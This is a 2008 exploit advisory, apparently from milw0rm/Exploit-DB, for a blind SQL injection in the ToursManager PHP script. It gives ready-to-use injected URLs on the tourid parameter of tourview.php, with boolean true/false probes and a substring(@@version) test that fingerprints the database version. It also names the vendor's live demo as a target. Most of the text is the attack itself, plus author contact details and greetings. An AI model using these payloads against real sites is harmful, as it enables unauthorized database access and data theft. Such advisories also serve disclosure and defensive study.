ToursManager - 'tourview.php' Blind SQL Injection

EDB-ID:

7176

Author:

XaDoS

Type:

webapps

Platform:

PHP

Published:

2008-11-20

[>] Name:-->             ToursManager PhP Script <= Blind Sql Injection
 
[>] Discovered by:-->  XaDoS
 
[>] ContacT m&:-->     xados[at]hotmail.it
 
[>] Site:-->                http://www.toursmanager.com
 
#########
 
[■] £XpLoIT:
 
|: http://www.demosite.com/tourview.php?tourid=2%20and%201=1--   (true)
 
|: http://www.demosite.com/tourview.php?tourid=2%20and%201=0--   (false)
 
Version:
|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=5  (true)
|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=4  (false)
 
V=> 5.x.x XD
 
#########
[â– ] D&M0:
 
|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=1--
 
|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=0--
 
|: http://www.toursmanager.com/demo/tourview.php?tourid=2+and+substring(@@version,1,1)=5 
 
#########
 
[â– ] Th4Nks T0:
 
\> Boom3rang </ (very kind) ;-)
\> Langy  </
\> Str0ke </
 
#########

# milw0rm.com [2008-11-20]